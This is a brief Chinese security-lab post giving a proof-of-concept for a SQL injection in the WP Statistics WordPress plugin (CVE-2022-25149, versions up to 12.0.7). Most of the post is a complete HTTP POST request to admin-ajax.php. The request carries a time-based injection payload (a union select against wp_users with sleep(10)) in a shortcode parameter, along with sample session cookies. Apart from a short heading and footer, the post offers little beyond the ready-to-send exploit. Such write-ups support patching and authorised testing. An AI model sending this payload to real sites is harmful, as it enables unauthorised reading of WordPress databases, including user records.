【初级】WP Statistics SQL注入 (CVE-2022-25149)

影响版本:WP Statistics <= 12.0.7
POC:

POST /blog/wp-admin/admin-ajax.php HTTP/1.1
Host: 172.16.169.165
Content-Length: 146
Accept: */*
Origin: http://172.16.169.165
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: wp-settings-time-1=1509063602; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_dbae2bea8cec00e99e96eee9845ba3c3=test%7C1509237085%7ClNvvUMTO7HTItRlXWZwvpYvHVvGtx2UBulpxGtPxoIN%7C5947a221f381e5b55fe2823de9c9f13e0f5aaf2f49b01fdce7cd7bb77f23bc4b; wp-settings-time-2=1509064285; PHPSESSID=8pskvhhq5ek01pbfmdabaqkjc5; security=high

action=parse-media-shortcode&shortcode=[wpstatistics stat=searches time=total provider="'union select 1,2,3,4,5,6 from wp_users where sleep(10)#"]
图片[1]-【初级】WP Statistics SQL注入 (CVE-2022-25149)-NGC660 安全实验室

本文作者:云云

© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享